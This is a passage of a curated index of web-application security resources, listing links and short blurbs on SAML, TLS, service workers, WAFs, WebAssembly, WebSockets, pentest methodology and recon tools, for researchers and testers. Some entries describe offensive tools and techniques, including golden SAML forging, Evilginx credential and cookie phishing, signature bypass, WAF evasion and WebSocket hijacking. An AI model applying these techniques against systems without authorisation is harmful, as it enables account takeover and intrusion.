- In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application. shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider, more are in the works...
- Tools
- Evilginx
- Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. Its core runs on the Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content while intercepting traffic between client and server.
- SAMLReQuest Burpsuite Extension
- 101
- Service Worker - w3c
- This specification describes a method that enables applications to take advantage of persistent background processing, including hooks to enable bootstrapping of web applications while offline. The core of this system is an event-driven Web Worker, which responds to events dispatched from documents and other sources. A system for managing installation, versions, and upgrades is provided. The service worker is a generic entry point for event-driven background processing in the Web Platform that is extensible by other specifications.
- Web Worker - Wikipedia
- Web workers vs Service workers vs Worklets - bitsofcode(2018)
- Articles/Blogposts/Writeups
- Service Workers: an Introduction - developers.google
- Service Worker API - MDN(Mozilla)
- Using Service Workers - MDN(Mozilla)
- ServiceWorker is dangerous - @steike(2014)
- Abusing the Service Workers API - Daniel Abeles(2020)
- Stuff I wish I'd known sooner about service workers - Rich Harris
- Service Worker Security FAQ - Chromium.google
- Papers
- Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Computation - Panagiotis Papadopoulos, Panagiotis Ilia, Michalis Polychronakis, Evangelos P. Markatos, Sotiris Ioannidis, Giorgos Vasiliadis(2019)
- In this paper, we demonstrate the powerful capabilities that modern browser APIs provide to attackers by presenting MarioNet: a framework that allows a remote malicious entity to control a visitor’s browser and abuse its resources for unwanted computation or harmful operations, such as cryptocurrency mining, password-cracking, and DDoS. MarioNet relies solely on already available HTML5 APIs, without requiring the installation of any additional software. In contrast to previous browser-based botnets, the persistence and stealthiness characteristics of MarioNet allow the malicious computations to continue in the background of the browser even after the user closes the window or tab of the initially visited malicious website. We present the design, implementation, and evaluation of our prototype system, which is compatible with all major browsers, and discuss potential defense strategies to counter the threat of such persistent in-browser attacks. Our main goal is to raise awareness about this new class of attacks, and inform the design of future browser APIs so that they provide a more secure client-side environment for web applications.
- Tools
- Service Worker Cookbook
- The Service Worker Cookbook is a collection of working, practical examples of using service workers in modern web sites.
- 101
- 101
- Subresource Integrity - W3.org
- Subresource Integrity - w3c.github.io
- This specification defines a mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation.
- Articles/Blogposts/Writeups
- Tools
- 101
- Transport Layer Security - Wikipedia
- RFC 6101: The Secure Sockets Layer (SSL) Protocol Version 3.0 - IETF
- RFC 2246: The TLS Protocol - IETF
- RFC 5246: The Transport Layer Security (TLS) Protocol Version 1.2 - IETF
- RFC 8446: The Transport Layer Security (TLS) Protocol Version 1.3 - IETF
- RFC 8740: Using TLS 1.3 with HTTP/2 - IETF
- Articles/Blogposts/Presentations/Talks/Writeups
- Transport Layer Security (TLS) Extensions
- Mixed content - w3c
- This specification describes how a user agent should handle fetching of content over unencrypted or unauthenticated connections in the context of an encrypted and authenticated document.
- Understanding SSL — Secure Socket Layer | 2023 - Karthikeyan Nagaraj(2022)
- How HTTPS Works
- A Detailed Look at RFC 8446 (a.k.a. TLS 1.3) - Nick Sullivan(2018)
- curl’s TLS fingerprint - Daniel Stenberg(2022)
- Attacks Against
- Articles/Blogposts/Writeups
- Talks/Presentations
- SSL/TLS Interception Proxies and Transitive Trust
- Secure Sockets Layer (SSL) and its successor Transport Layer Security (TLS), have become key components of the modern Internet. The privacy, integrity, and authenticity provided by these protocols are critical to allowing sensitive communications to occur. Without these systems, e-commerce, online banking, and business-to-business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities. Advanced Persistent Threat (APT ) attackers, botnets, and eve n commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end-to-end encrypted channels. Web proxies, data loss prevention (DLP) systems, specialized threat detection solutions, and network intrusion prevention systems (NIPS) offer functionality to intercept, inspect, and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surveillance of encrypted communications by governments. Broadly classified as “SSL/TLS interception proxies”, these solutions act as a “man-in-the-middle", violating the end-to-end security promises of SSL. This type of interception comes at a cost. Intercepting SSL-encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation. Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances
- Tools
- 101
- Articles/Blogposts/Writeups
- Single Sign-On Security: Security Analysis of real-life OpenID Connect Implementations - Lauritz Holtmann(2020)
- Improving OAuth App-to-App Security - Fabian Hauck, Joseph Heenan, Daniel Fett(2020)
- Security and Privacy of Social Logins (I): Single Sign-On Protocols in the Wild - Louis Jannett(2021)
- SSO Wars: The Token Menace - Alvaro Muñoz, Oleksandr Mirosh
- Common Federated Identity Protocols: OpenID Connect vs OAuth vs SAML 2 - Security Journey
- Breaking Through Single Sign On (SSO) - Alex Bainbridge
- Talks & Presentations
- Dupe Key Confusion
- An attack to bypass XML signature verification by sending multiple key identifiers in the KeyInfo section. Vulnerable systems will use the first one to verify the XML signature and the second one to verify the trust on the signing party. This plugin applies this technique to SAML tokens by allowing one to modify and then re-sign the SAML assertion with an arbitrary attacker-controlled key, which is then sent as the first element of the KeyInfo section, while the original key identifier is sent as the second key identifier.
- Tools
- Tools
- PrOfESSOS
- PrOfESSOS is our open source implementation for fully automated Evaluation-as-a-Service for SSO. PrOfESSOS introduces a generic approach to improve the security of OpenID Connect implementations by systematically detecting vulnerabilities.
- 101
- Streams - Dec 12 2019
- This specification provides APIs for creating, composing, and consuming streams of data that map efficiently to low-level I/O primitives.
- 101
- Articles/Blogposts
- Talks/Presentations
- Unraveling Unicode: A Bag of Tricks for Bug Hunting - Chris Weber(BHUSA2009)
- 5 Unicode Vulnerabilities that could bi/yte you - Philippe Arteau
- Slides
- "In this talk, you will learn about the security implications of encoding conversion. Normalizing a UTF-8 string to ASCII only character has numerous potential side effects. The latest research affecting Unicode will be summarized including the HostSplit and HostBond attacks. The HostSplit attack abuses minor characters conversion to trigger open redirect or Server-Side Request Forgery (SSRF). While HostBond is a risk affecting service provider giving subdomain to account created by users. Aside from normalization, uppercase and lowercase transformation can introduce vulnerability. Encoding can be used to circumvent security controls such as Web Application Firewalls. Punycode is the new representation to support domains with special characters outside of ASCII. This representation can be used to create visual confusion to end users."
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Data URIs
- 101
- data URI scheme - Wikipedia
- The data URI scheme is a uniform resource identifier (URI) scheme that provides a way to include data in-line in Web pages as if they were external resources. It is a form of file literal or here document. This technique allows normally separate elements such as images and style sheets to be fetched in a single Hypertext Transfer Protocol (HTTP) request, which may be more efficient than multiple HTTP requests, and used by several browser extensions to package images as well as other multimedia contents in a single HTML file for page saving. As of 2015, data URIs are fully supported by most major browsers, and partially supported in Internet Explorer and Microsoft Edge.
- Data URLs - MDN(Mozilla)
- Data URIs - Chris Coyier
- Articles/Blogposts/Writeups
- Tools
- 101
- 101
- Awesome WAF
- 🔥 Everything awesome about web-application firewalls (WAF).
- Web Application Firewalls
- ModSecurity
- ModSecurity is an open source, cross-platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis.
- Shadow Daemon
- Shadow Daemon is a collection of tools to detect, record and prevent attacks on web applications. Technically speaking, Shadow Daemon is a web application firewall that intercepts requests and filters out malicious parameters. It is a modular system that separates web application, analysis and interface to increase security, flexibility and expandability. Shadow Daemon is free software. It is released under the GPLv2 license, so its source code can be examined, modified and distributed by everyone.
- Articles/Blogposts/Writeups
- Bypassing WAFs
- WAF Bypass Cheatsheet/gitbook
- Web Application Firewall (WAF) Evasion Techniques - theMiddle
- Web Application Firewall (WAF) Evasion Techniques #2 - theMiddle
- Web Application Firewall (WAF) Evasion Techniques - secjuice
- Bypassing Web-Application Firewalls by abusing SSL/TLS - 0x09AL
- Request encoding to bypass web application firewalls - NCCGroup
- WAF bypass techniques - Pentestit(2019)
- A Pentester's Guide - Part 5 (Unmasking WAFs and Finding the Source) - pyr0cc
- WAF Bypassing with Unicode Compatibility - Jorge Lajara(2020)
- Bypassing WAF to do advanced Error-Based SQL Injection - kleiton0x7e(2020)
- Bypassing CDN WAF’s with Alternate Domain Routing - Ryan Gerstenkorn(2022)
- How to Bypass Cloudflare in 2023: The 8 Best Methods - ZenRows(2023)
- A guide to non-conventional WAF/IDS evasion techniques - 0xFFFFF
- Web application firewalls bypasses collection and testing tools
- {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF - Noam Moshe(2022)
- Bypass firewalls with of-CORs and typo-squatting - Grayson(2023)
- Talks & Presentations
- HTTP Invisibility Cloak by Soroush Dalili - SteelCon2017
- This talk illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
- Web Application Firewall Profiling and Evasion - Michael Ritter
- Let's Talk About WAF (Bypass) Baby - Brett Gravois(NolaCon2019)
- All modern Web Application Firewalls are able to intercept (and even block) most common attacks from the web. However, what happens when an attacker uses HTTP2 to send attack traffic to a web application or service? In this talk we will cover basic attacks against web applications using HTTP2 to bypass WAFs and Proxies. Attendees will gain knowledge of how to bypass WAF and Proxies using the HTTP2 Protocol, and steps they can take to protect themselves against these kinds of attacks.
- Modern WAF Bypass Scripting Techniques for Autonomous Attacks - Jonny Xmas(2019)
- WAF Breakthrough in the Cloud Era - pyn3rd(2019)
- AutoSpear : Towards Automatically Bypassing and Inspecting Web Application Firewalls - Zhenqing Qu, Xiang Ling, Chunming Wu(BHAsia2022)
- Tools
- WhatWaf
- WhatWaf is an advanced firewall detection tool whose goal is to give you the idea of "There's a WAF?". WhatWaf works by detecting a firewall on a web application, and attempting to detect a bypass (or two) for said firewall, on the specified target.
- WAFPASS
- Analysing parameters with all payloads' bypass methods, aiming at benchmarking security solutions like WAF.
- WAF_buster
- LightBulb
- LightBulb is an open source python framework for auditing web application firewalls and filters.
- WAFNinja
- WAFNinja is a tool which contains two functions to attack Web Application Firewalls.
- Web Application Firewall Profiling and Evasion - Michael Ritter - OWASP
- Guide To Identifying And Bypassing WAFs
- ftw
- Framework for Testing WAFs (FTW!)
- wafw00f
- WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.
- cdn-proxy
- A tool that can be used by web app pentesters to create a copy of a targeted website with CDN and WAF restrictions disabled.
- 101
- Web Assembly
- WebAssembly Specification
- A cartoon intro to WebAssembly - Lin Clark (article series)
- Lin Clark: A Cartoon Intro to WebAssembly | JSConf EU 2017
- WebAssembly Design Documents
- This repository contains documents describing the design and high-level overview of WebAssembly.
- WebAssembly - MDN(Mozilla)
- How WebAssembly changes software distribution - Max Desiatov(2020)
- WebAssembly. Scary name, exciting applications. - Nicky Meuleman
- wasm-fizzbuzz - Cornelius Diekmann
- WebAssembly from Scratch: From FizzBuzz to DooM.
- Articles/Papers/Talks/Writeups
- Papers
- Security Chasms of WASM - Brian McFadden, Tyler Lukasiewicz, Jeff Dileo, Justin Engler(2018)
- WebAssembly is a new technology that allows web developers to run native C/C++ on a webpage with near-native performance. This paper provides a basic introduction to WebAssembly and examines the security risks that a developer may take on by using it. We cover several examples exploring the theoretical security implications of WebAssembly. We also cover Emscripten, which is currently the most popular WebAssembly compiler toolchain. Our assessment of Emscripten includes its implementation of compiler-and-linker-level exploit mitigations as well as the internal hardening of its libc implementation, and how its augmentation of WASM introduces new attack vectors and methods of exploitation. We also provide examples of memory corruption exploits in the Wasm environment. Under certain circumstances, these exploits could lead to hijacking control flow or even executing arbitrary JavaScript within the context of the web page. Finally, we provide a basic outline of best practices and security considerations for developers wishing to integrate WebAssembly into their product.
- Everything Old is New Again: Binary Security of WebAssembly - Daniel Lehmann, Johannes Kinder, Michael Pradel(2020)
- WebAssembly is an increasingly popular compilation target designed to run code in browsers and on other platforms safely and securely, by strictly separating code and data, enforcing types, and limiting indirect control flow. Still, vulnerabilities in memory-unsafe source languages can translate to vulnerabilities in WebAssembly binaries. In this paper, we analyze to what extent vulnerabilities are exploitable in WebAssembly binaries, and how this compares to native code. We find that many classic vulnerabilities which, due to common mitigations, are no longer exploitable in native binaries, are completely exposed in WebAssembly. Moreover, WebAssembly enables unique attacks, such as overwriting supposedly constant data or manipulating the heap using a stack overflow. We present a set of attack primitives that enable an attacker (i) to write arbitrary memory, (ii) to overwrite sensitive data, and (iii) to trigger unexpected behavior by diverting control flow or manipulating the host environment. We provide a set of vulnerable proof-of-concept applications along with complete end-to-end exploits, which cover three WebAssembly platforms. An empirical risk assessment on real-world binaries and SPEC CPU programs compiled to WebAssembly shows that our attack primitives are likely to be feasible in practice. Overall, our findings show a perhaps surprising lack of binary security in WebAssembly. We discuss potential protection mechanisms to mitigate the resulting risks.
- Tools
- WebAssembly for .NET
- A library able to create, read, modify, write and execute WebAssembly (WASM) files from .NET-based applications. Execution does not use an interpreter. WASM instructions are mapped to their .NET equivalents and converted to native machine language by the .NET JIT compiler.
- octopus
- Security Analysis tool for WebAssembly module (wasm) and Blockchain Smart Contracts (BTC/ETH/NEO/EOS)
- WasmEdge
- WasmEdge is a lightweight, high-performance, and extensible WebAssembly runtime for cloud native, edge, and decentralized applications. It powers serverless apps, embedded functions, microservices, smart contracts, and IoT devices.
- Reversing
- Web-(Dis)Assembly - Christophe Alladoum - Shakacon X
- https://github.com/sophos/WebAssembly/blob/master/Misc/Web-(Dis)Assembly.pdf
- Analyzing WebAssembly binaries: initial feel and behavioral analysis - John Bergbom
- Analyzing WebAssembly binaries - Wasm Reverse Engineering - John Bergbom
- Manual reverse engineering of WebAssembly: static code analysis - John Bergbom
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- 101
- Articles/Blogposts/Writeups
- 101
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations
- Weird proxies/2 and a bit of magic - Aleksei Tiurin(ZeroNights2021)
- Reverse proxies and their variations are used everywhere in modern web applications for routing, caching, and access differentiation. This talk is dedicated to new research results about different reverse proxies and new possibilities brought by HTTP/2. It is a collection of tricks for exploiting various misconfigurations.
- Tools
- Burpsuite
- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
- See burp section at bottom of page.
- ZAP - Zed Attack Proxy
- The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
- ZAP Deep Dive Series - StackHawk
- https://www.youtube.com/playlist?list=PLz_NN8o2uh8AQ7VyUEN1GCCnpzl5_FaJA
- https://github.com/zaproxy/zap-extensions/wiki/HelpAddonsOpenapiOpenapi
- https://github.com/zaproxy/zap-extensions
- https://github.com/we45/ZAP-Mini-Workshop
- Paros - Web Proxy
- A Java-based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other features include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
- Mallory: Transparent TCP and UDP Proxy
- Mallory is a transparent TCP and UDP proxy. It can be used to get at those hard to intercept network streams, assess those tricky mobile web applications, or maybe just pull a prank on your friend.
- TCP Catcher
- TcpCatcher is a free TCP, SOCKS, HTTP and HTTPS proxy monitor server software.
- wssip
- Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
- ratproxy
- Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.
- proxify
- Swiss Army Knife Proxy for rapid deployments. Supports multiple operations such as request/response dump, filtering and manipulation via DSL language, upstream HTTP/Socks5 proxy. Additionally, a replay utility allows to import the dumped traffic (request/responses with correct domain name) into BurpSuite or any other proxy by simply setting the upstream proxy to proxify.
- 101
- Articles/Papers/Talks/Writeups
- WebRTC API - MozillaDevNetwork
- WebRTC - High Performance Browser Networking
- WebRTC for the Curious: Go beyond the APIs
- The WebRTC book that explains everything. WebRTC is a real-time communication framework that makes it easy to build real-time interactions for web and mobile devices. You will learn about the WebRTC specification and how all the protocols work in depth, not just a tour of the APIs. The book is completely Open Source and available at https://webrtcforthecurious.com and https://github.com/webrtc-for-the-curious/webrtc-for-the-curious Learn the full details of ICE, SCTP, DTLS, SRTP, and how they work together to make up the WebRTC stack. Hear how WebRTC implementers debug issues with the tools of the trade. Listen to interviews with the authors of foundational WebRTC tech! Hear the motivations and design details that pre-dated WebRTC by 20 years. Explore the cutting edge of what people are building with WebRTC. Learn about interesting use cases and how real-world applications get designed, tested and implemented in production. Written by developers who have written all of this from scratch. We learned it the hard way, now we want to share it with you! This book is vendor agnostic and multiple Open Source projects and companies are involved. We would love to have you involved!
- Exploiting CVE-2022-0778, a bug in OpenSSL vis-à-vis WebRTC platforms - Sandro Gauci(2022)
- Tools
- Miscellaneous
- Apache
- IIS
- Jetty
- NGINX
- 101
- The WebSocket Protocol Standard - IETF
- WebSocket Protocol - RFC Draft 17
- Websockets - An Introduction - subudeepak
- RFC 6455: The WebSocket Protocol - IETF
- The WebSocket Protocol enables two-way communication between a client running untrusted code in a controlled environment to a remote host that has opted-in to communications from that code. The security model used for this is the origin-based security model commonly used by web browsers. The protocol consists of an opening handshake followed by basic message framing, layered over TCP. The goal of this technology is to provide a mechanism for browser-based applications that need two-way communication with servers that does not rely on opening multiple HTTP connections (e.g., using XMLHttpRequest or `<iframe>`s and long polling).
- How Do Websockets Work? - Kevin Sookocheff(2019)
- Articles/Papers/Talks/Writeups
- What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs. - Mikhail Egorov
- Hacking Web Sockets: All Web Pentest Tools Welcomed - VDALabs(2019)
- To Fuzz a WebSocket - Andreas Happe(2019)
- Once upon a time there was a WebSocket - Jason Gillam(2020)
- WebSockets: Attack Techniques and Protection Measures - Michael Schneider(2021)
- Everything You Need to Know About Web Socket Pentesting - Saket Taneja(2021)
- HN Discussion on 'Websocket Handbook' (2022)
- Talks/Presentations/Videos
- Old Tools, New Tricks: Hacking WebSockets - Michael Fowl, Nick Defoe(Derbycon2019)
- Old Tools, New Tricks: Hacking WebSockets - Michael Fowl, Nick Defoe(2019)
- Many application penetration testers and developers have struggled to figure out how to assess the security of WebSocket applications. When new technologies like WebSockets are developed, often the tooling available for penetration testing takes awhile to catch up. What if you could use traditional web penetration testing tools to assess WebSockets? By leveraging concepts found in native code fuzzing, you can! We have been using a novel approach that allows traditional web security testing tools to find vulnerabilities in WebSocket applications.
- Tools
- WSSiP: A WebSocket Manipulation Proxy
- Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
- Websocket Fuzzer
- A simple WebSocket fuzzer for application penetration testing; HTML5 WebSocket message fuzzer.
- websocket-harness
- This Python script can be placed between traditional web penetration testing tools and WebSocket connections, translating from HTTP to WebSocket and back. Think of it like a fuzzing harness that is used for native code.
- cswsh
- A command-line tool for Cross-Site WebSocket Hijacking
- SockJS-client
- SockJS is a browser JavaScript library that provides a WebSocket-like object. SockJS gives you a coherent, cross-browser, Javascript API which creates a low latency, full duplex, cross-domain communication channel between the browser and the web server.
- uWebSockets
- "Simple, secure & standards compliant web server for the most demanding of applications"
- websockets
- "Library for building WebSocket servers and clients in Python"
- websocat
- Command-line client for WebSockets, like netcat (or curl) for ws:// with advanced socat-like functions
- Miscellaneous
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- WebUSB - How a website could steal data off your phone
- This blog post looks into the capabilities of WebUSB to understand how it works, the new attack surface, and privacy issues. We will describe the processes necessary to get access to devices and how permissions are handled in the browser. Then we will discuss some security implications and show how a website can use WebUSB to establish an ADB connection and effectively compromise a connected Android phone.
- General Stuff
- Securing
- See Defense page.
- Guides & Methodologies
- Documents/Writeups
- OWASP Testing Checklist
- WebAppSec Testing Checklist
- OWASP Testing Checklist(OTGv4)
- The OWASP-based Web Application Security Testing Checklist is an Excel-based checklist which helps you to track the status of completed and pending test cases. This checklist is completely based on OWASP Testing Guide v4. The OWASP Testing Guide includes a "best practice" penetration testing framework which users can implement in their own organizations and a "low level" penetration testing guide that describes techniques for testing the most common web application security issues. Moreover, the checklist also contains an OWASP Risk Assessment Calculator and a Summary Findings template.
- LTR101: Web App Testing - Methods to The Madness - Andy Gill
- LTR101: Web Application Testing Methodologies - Andy Gill
- OWASP Web Application Security Testing Cheat Sheet
- 120 Days of High Frequency Hunting - Kuldeep Pandya(2022)
- The-XSS-Rat Security Testing notes
- How To Hack Web Applications in 2022: Part 1 - Luke Stephens(2022)
- 0-Day Hunting (Chaining Bugs/Methodology) - RiotSecurityTeam(2021)
- Pentesting Web checklist - six2dez
- HolyBugx/HolyTips
- "A Collection of Notes, Checklists, Writeups on Bug Bounty Hunting and Web Application Security."
- MindMaps
- Collection of various mindmaps for testing.
- Online Casino Roulette – A guideline for penetration testers and security researchers - Jesús Calderón Marín(2020)
- Common Security Issues in Financially-Oriented Web Applications - Soroush Dalili(2019)
- From ZERO To HERO In Web Security Research(Defcon29 Workshop)
- KathanP19/HowToHunt
- "Collection of methodology and test case for various web vulnerabilities."
- A Konami Code for Vuln Chaining Combos - Curtis Brazzell(2021)
- riramar/Web-Attack-Cheat-Sheet
- Bunch of tools and associated commands for techniques using said tools.
- Golden-Guide-for-Pentesting/Web Application
- This is a Web Security Guide for Pentesting, BugBounty and CTFs.
- Talks/Presentations
- The Bug Hunter’s Methodology - Jason Haddix @jhaddix(Defcon Safemode RedTeamVillage 2020)
- The Bug Hunter’s Methodology is an ongoing yearly installment on the newest tools and techniques for bug hunters and red teamers. This version explores both common and lesser-known techniques to find assets for a target. The topics discussed will look at finding a target's main seed domains, subdomains, IP space, and discuss cutting edge tools and automation for each topic. By the end of this session a bug hunter or red teamer will be able to discover and multiply their attack surface. We also discuss several vulnerabilities and misconfigurations related to the recon phase of assessment.
- Web Application testing approach and cheating to win - Jim McMurry, Lee Neely, Chelle Clements(Derbycon7)
- Testing stateful web application workflows - András Veres-Szentkirályi(2016)
- Paper
- Most web applications used for complex business operations and/or employing advanced GUI frameworks have stateful functionality. Certain workflows, for example, might require completing certain steps before a transaction is committed, or a request sent by a client-side UI element might need several preceding requests that all contribute to the session state. Most automated tools focus on a request and maybe a redirection, thus completely missing the point in these cases, where resending a request gets ignored by the target application. As a result, while these tools are getting better day by day, using them for testing such execution paths is usually out of the question. Since thorough assessment is cumbersome without such tools, there's progress, but we are far from plug-and-play products. This paper focuses on the capabilities of currently available solutions, demonstrating their pros and cons, along with opportunities for improvement.
- Breaking and abusing specifications and policies - Frans Rosén(SecurityFest 2018)
- Last year at Secfest, Frans Rosén talked about DNS hijacking using cloud services. This time, he approaches technologies where verification methods actually exist and how to break them. Let’s Encrypt closed down one of their three blessed verification methods due to a bug Frans found in January. Cloud storage containers already patched from being publicly exposed are still often vulnerable to full modification, extraction and deletion by abusing weak policies and application logic. Frans goes through some weak design patterns and policy structures and explains how to bypass them, which has netted him over $45,000 in bug bounties.
- Attacking Modern Web Technologies - Frans Rosén(NDC Oslo 2018)
- In this talk, top ranked white-hat hacker Frans Rosén will focus on methodologies and results of attacking modern web technologies. He will explain how he accessed private Slack tokens by using postMessage and WebSocket-reconnect, and how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
- Live Bug Bounty Recon Session w/ @FransRosen 2019
- Free Tools For Webapp Hacking - BB King(WWHF Deadwood2020)
- Documents/Writeups
- Tactics
- Writeups of techniques
- Using HTTP Pipelining to hide requests - digi.ninja
- Advanced web security topics - george georgovassilis(2020)
- Backslash Powered Scanning: Hunting Unknown Vulnerability Classes
- Existing web scanners search for server-side injection vulnerabilities by throwing a canned list of technology-specific payloads at a target and looking for signatures - almost like an anti-virus. In this document, I'll share the conception and development of an alternative approach, capable of finding and confirming both known and unknown classes of injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
- Asynchronous Vulns
- AuthN Testing
- Articles/Blogposts/Writeups
- Tools
- AuthCov
- AuthCov crawls your web application using a Chrome headless browser while logged in as a pre-defined user. It intercepts and logs API requests as well as pages loaded during the crawling phase. In the next phase it logs in under a different user account, the "intruder", and attempts to access each one of the API requests or pages discovered previously. It repeats this step for each intruder user defined. Finally it generates a detailed report listing the resources discovered and whether or not they are accessible to the intruder users.
- Out-of-Band Attacks
- Using Browser Devtools for testing
- Chrome DevTools - Google
- I don’t need no proxy - Pentesterlab
- Sending real-time browsing data directly to fuzzers from Chrome remote debugging
- Writeups of techniques
- General Reconnaissance Techniques
- General Articles/Methodology Writeups
- Just another Recon Guide for Pentesters and Bug Bounty Hunters - @slashcrypto(2020)
- Turbo Intruder: Embracing the billion-request attack - James Kettle(2020)
- Bug Bounty Methodology…Just Have a Look.! - Naveenroy(2020)
- ReconNotes - bminossi
- The Bug Hunter's Methodology (TBHM)
- Simple Recon Methodology - Eslam Aki(2020)
- zeroc00I/ReconNotes
- "Just some public notes that can be useful and i want let the world knows."
- Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters - Ahmad Halabi(2021)
- How to achieve enterprise-grade attack-surface monitoring with open source software - hakluke(2021)
- Attack Surface Management. You’re (probably) doing it wrong. - Steve Micallef(2021)
- Attacking the Perimeter - Miguel Martinez(2020)
- epi052/recon-pipeline
- How to Build an Automated Recon Pipeline with Python and Luigi - Part I (Setup and Scope) - epi052
- Application Enumeration Tips using Aquatone and Burp Suite - Ryan Wendell(2019)
- The Anti-Recon Recon Club (using ReconFTW) - jhaddix
- It's the little things - Jon Bottarini(Disobey 2018)
- Tools that didn't fit elsewhere
- webgrep
- This self-contained tool relies on the well-known grep tool for grepping Web pages. It binds nearly every option of the original tool and also provides additional features like deobfuscating JavaScript or applying OCR on images before grepping downloaded resources.
- (Almost)Fully Automating Recon
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Mechanizing the Methodology : Automating Discovery, Testing, and Alerting using Recon/Testing Tools and Amazon SES - Daniel Miessler(Defcon Safemode RTV2020)
- There are a million techniques out there for finding new attack surface and finding potential vulnerabilities; the problem is finding the time to run your entire methodology against all your targets. This talk will take you through finding new attack surface, performing multiple types of tests against those targets, and sending real-time alerts---all on a continuous basis using automation from a cloud-based Linux host.
- Writeup/Review by Clint Gibler(recommend reading)
- Tools
- chomp-scan
- A scripted pipeline of tools to simplify the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.
- Attack Surface Reconnaissance
- Articles/Blogposts/Writeups
- Asset Enumeration: Expanding a Target's Attack Surface - Capt. Meelo
- What's in a Domain Name? - Collin Meadows(SecureWV/Hack3rcon2018)
- The domain name is one of the most prominent assets an organization can have. While customers can discover an organization from many sources - social media, review aggregators, advertisements, etc - the webpage is often the first direct experience a person has with a business and brand. This vital role makes the domain a target for fraud, data leakage, and cyber attack. Implementing domain monitoring and performing risk assessments is important, but only half the battle. In this talk, we will consider the amount of intelligence one can gather starting from only a domain name and investigate how this sets an attacker up with an ideal blueprint for malicious action.
- Basic Recon Using A Domain Name - Cedric Owens(2020)
- Tools
- AttackSurfaceMapper
- Attack Surface Mapper is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target. You feed in a mixture of one or more domains, subdomains and IP addresses and it uses numerous techniques to find more targets. It enumerates subdomains with bruteforcing and passive lookups, other IPs of the same network block owner, IPs that have multiple domain names pointing to them and so on. Once the target list is fully expanded it performs passive reconnaissance on them, taking screenshots of websites, generating visual maps, looking up credentials in public breaches, passive port scanning with Shodan and scraping employees from LinkedIn.
- intrigue-core
- Intrigue-core is a framework for external attack surface discovery and automated OSINT.
- Domain Analyzer
- Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.
- domain-profiler
- domain-profiler is a tool that uses information from various sources (Whois, DNS, SSL, ASN) to determine what decisions have been made regarding a domain or list of domains.
- The Hamburglar
- Hamburglar -- collect useful information from urls, directories, and files
- AutoRecon
- Simple shell script for automated domain recognition with some tools
- AutoRecon for Automated Reconnaissance - Ahmed Elsobky
- Websy
- Keep an eye on your targets with Websy to get quickly notified for any change they push on their Web Server
- BlueEye
- Blue Eye is a python Recon Toolkit script. It shows subdomain resolves to the IP addresses, company email addresses and much more ..!
- FinalRecon
- "FinalRecon is an automatic web reconnaissance tool written in python. Goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another it can provide similar results keeping dependencies small and simple."
- changedetection.io
- "The best and simplest self-hosted free open source website change detection, monitor and notification service."
- KENZER - Automated web assets enumeration & scanning
- webstor
- "A script to quickly enumerate all websites across all of your organization's networks, store their responses, and query for known web technologies, such as those with zero-day vulnerabilities."
- cariddi
- Take a list of domains, crawl urls and scan for endpoints, secrets, api keys, file extensions, tokens and more
- Crossfeed
- Crossfeed is a tool that continuously enumerates and monitors an organization's public-facing attack surface in order to discover assets and flag potential security flaws. By operating in either passive or active scanning modes, Crossfeed collects data from a variety of open source tools and data feeds to provide actionable information about organization assets. Crossfeed is offered as a self-service portal and allows customers to view reports and customize scans performed.
- kunyu
